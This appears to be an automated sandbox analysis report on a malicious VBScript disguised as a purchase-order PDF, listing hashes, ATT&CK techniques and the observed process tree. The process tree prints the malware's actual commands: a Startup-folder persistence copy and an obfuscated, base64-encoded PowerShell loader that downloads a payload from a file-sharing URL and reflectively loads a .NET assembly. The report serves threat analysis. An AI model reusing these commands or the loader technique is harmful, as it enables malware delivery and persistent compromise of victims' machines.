879dc95c721b68613a3b30899288749e6331fbe698e823092ee9d89ce2318b1a

General

Target

PO2725724312_pdf.vbs
Size

12KB
MD5

2c548eb64145d9cd7308584191ff0976
SHA1

f2a0f23393dbe76a37819e3b76b7cb24070d696d
SHA256

879dc95c721b68613a3b30899288749e6331fbe698e823092ee9d89ce2318b1a
SHA512

85d3f5ecab588ae6b715dccd14bfb6f5f2d729ddc5abf2bedb62cd6b3ce5bf3049d2615dade76993e76b683de76f443da93a1f273efe420d1c7bd626379dcf76
SSDEEP

192:k9L/aGdqjaQlUsQRwitSUCUaQlWL3MgZrdGHRkfkI:km/5+ww3ScgZrdGHRk8I

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2764	WScript.exe
4	2764	WScript.exe
8	1572	powershell.exe
9	1572	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1680	powershell.exe
3064	powershell.exe
1572	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2692	cmd.exe
2804	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2804	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1680	powershell.exe
3064	powershell.exe
1572	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	1572	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2764 wrote to memory of 2692	2764	WScript.exe	30
PID 2764 wrote to memory of 2692	2764	WScript.exe	30
PID 2764 wrote to memory of 2692	2764	WScript.exe	30
PID 2692 wrote to memory of 2804	2692	cmd.exe	32
PID 2692 wrote to memory of 2804	2692	cmd.exe	32
PID 2692 wrote to memory of 2804	2692	cmd.exe	32
PID 2692 wrote to memory of 1680	2692	cmd.exe	33
PID 2692 wrote to memory of 1680	2692	cmd.exe	33
PID 2692 wrote to memory of 1680	2692	cmd.exe	33
PID 2764 wrote to memory of 3064	2764	WScript.exe	34
PID 2764 wrote to memory of 3064	2764	WScript.exe	34
PID 2764 wrote to memory of 3064	2764	WScript.exe	34
PID 3064 wrote to memory of 1572	3064	powershell.exe	36
PID 3064 wrote to memory of 1572	3064	powershell.exe	36
PID 3064 wrote to memory of 1572	3064	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO2725724312_pdf.vbs"
1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PO2725724312_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\PO2725724312_pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggKFtzVHJJbkddJHZFUkJPc2VwUmVmRXJlTmNFKVsxLDNdKydYJy1Kb2lOJycpICgoJ3MnKydoT2ltYWdlVXJsID0gaDVTaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvJysnbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYlcnKydvOVJlJysndTQ1dDdCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyJysnblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBoNVM7c2hPd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtzaE9pbWFnZUJ5dGVzID0gc2hPd2ViQ2xpZW50LkRvd25sb2FkRGF0YShzaE9pJysnbWFnZVVybCk7c2hPaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nJysnXTo6VVRGOC5HZXRTdHJpbmcnKycoc2hPaW1hZ2VCeXRlcyk7c2hPc3RhcnRGbGFnID0gaDVTPDxCQVNFNjRfU1RBUlQ+Pmg1UztzaE9lbmRGbGFnID0gaDVTPDxCQVNFNjRfRU5EPj5oNVM7c2hPc3RhcnRJbmRleCA9IHNoT2ltYWdlVGV4dC5JbmRleE9mKHNoT3N0YXJ0RmxhZyk7c2hPZW5kSW5kZXggPSBzaE9pbWFnZScrJ1RleHQuSW5kZXhPZihzaE9lbmRGbGFnKTtzaE9zdGFydEluJysnZGV4IC1nZSAwIC1hbmQgc2hPZW5kSW5kZXggLWd0IHNoT3N0YXJ0SW5kZXg7c2hPc3RhcnRJbmRleCArPSBzaE8nKydzdGFydEZsYWcuTGVuZ3RoO3NoT2Jhc2U2NExlbmd0aCA9IHNoT2VuZEluZGV4IC0gc2hPc3RhcicrJ3RJbmRleDtzaE9iYXNlNjRDbycrJ21tYW5kID0gc2hPaW1hZ2VUZXh0LlN1YicrJ3N0cmluZyhzaE9zdGFydEluZGV4LCBzaE9iYXMnKydlNjRMZW5ndGgpO3NoT2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHNoT2JhJysnc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBTZHcgRm9yRWFjaC0nKydPYmplY3QgeyBzaE9fIH0pWy0xLi4tKHNoT2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07c2hPY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhzaE9iYXNlNjRSZXZlcnNlZCk7c2hPbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHNoT2NvbW1hJysnbmRCeXRlcyk7c2hPdicrJ2FpJysnTWV0aG8nKydkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChoNVNWQUloNVMpOycrJ3NoT3ZhaU1ldGhvZC5JbnZva2Uoc2hPbnVsbCwgQChoNVMwL3RjcDBSL2QvZWUuZXRzYXAvLzpzcHR0aGg1UywgaDVTZGVzYXRpdmFkb2gnKyc1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTTVNCdWlsZGg1UywgaDVTZGVzYXRpdmFkb2g1UywgaDVTZGVzYXRpdmFkb2g1UyxoNVNkZXNhdGl2YWRvaDVTLGg1U2Rlc2F0aXZhZG9oNVMsaDVTZGVzYXRpdmFkb2g1UyxoNVNkZXNhdGl2YWRvaDVTLGg1JysnU2Rlc2F0aXZhZG9oNVMsaDVTMWg1UyxoNVNkZXNhdGl2YWRvaDUnKydTKSk7JykuUkVwTEFDRSgoW0NoQVJdMTE1K1tDaEFSXTEwNCtbQ2hBUl03OSksJyQnKS5SRXBMQUNFKChbQ2hBUl0xMDQrW0NoQVJdNTMrW0NoQVJdODMpLFtzdHJpbkddW0NoQVJdMzkpLlJFcExBQ0UoJ1NkdycsW3N0cmluR11bQ2hBUl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( ([sTrInG]$vERBOsepRefEreNcE)[1,3]+'X'-JoiN'') (('s'+'hOimageUrl = h5Shttps://1017.filemail.co'+'m/api/file/get?filekey=2Aa_bW'+'o9Re'+'u45t7BU1kVgsd9pT9pgSSlvStGr'+'nTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f h5S;shOwebClient = New-Object System.Net.WebClient;shOimageBytes = shOwebClient.DownloadData(shOi'+'mageUrl);shOimageText = [System.Text.Encoding'+']::UTF8.GetString'+'(shOimageBytes);shOstartFlag = h5S<<BASE64_START>>h5S;shOendFlag = h5S<<BASE64_END>>h5S;shOstartIndex = shOimageText.IndexOf(shOstartFlag);shOendIndex = shOimage'+'Text.IndexOf(shOendFlag);shOstartIn'+'dex -ge 0 -and shOendIndex -gt shOstartIndex;shOstartIndex += shO'+'startFlag.Length;shObase64Length = shOendIndex - shOstar'+'tIndex;shObase64Co'+'mmand = shOimageText.Sub'+'string(shOstartIndex, shObas'+'e64Length);shObase64Reversed = -join (shOba'+'se64Command.ToCharArray() Sdw ForEach-'+'Object { shO_ })[-1..-(shObase64Command.Length)];shOcommandBytes = [System.Convert]::FromBase64String(shObase64Reversed);shOloadedAssembly = [System.Reflection.Assembly]:'+':Load(shOcomma'+'ndBytes);shOv'+'ai'+'Metho'+'d = [dnlib.IO.Home].GetMethod(h5SVAIh5S);'+'shOvaiMethod.Invoke(shOnull, @(h5S0/tcp0R/d/ee.etsap//:sptthh5S, h5Sdesativadoh'+'5S, h5Sdesativadoh5S, h5Sdesativadoh5S, h5SMSBuildh5S, h5Sdesativadoh5S, h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5Sdesativadoh5S,h5'+'Sdesativadoh5S,h5S1h5S,h5Sdesativadoh5'+'S));').REpLACE(([ChAR]115+[ChAR]104+[ChAR]79),'$').REpLACE(([ChAR]104+[ChAR]53+[ChAR]83),[strinG][ChAR]39).REpLACE('Sdw',[strinG][ChAR]124) )"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ed0029b422499881f1e7c30edb6a4102

SHA1
56603732448ca430f94fa5e2bec022c834afb2f7

SHA256
e02997726df0f6cd5ccce361800be552bb30b2625699bcd81e71ac75671cd522

SHA512
e6695de1871f2a4c944d01adb602553c73a0537805853560eeee5aaeef21e3f818b66f3cc99307e24dcdb5ac5495fa3263a1ac1cd80ed6a62ff1139a6c20a2c6

Download Submit
memory/1680-5-0x000007FEF625E000-0x000007FEF625F000-memory.dmp

Filesize
4KB

Download
memory/1680-6-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/1680-7-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/1680-8-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/1680-9-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/1680-10-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/1680-11-0x000007FEF5FA0000-0x000007FEF693D000-memory.dmp

Filesize
9.6MB

Download
memory/3064-17-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/3064-18-0x0000000002910000-0x0000000002918000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing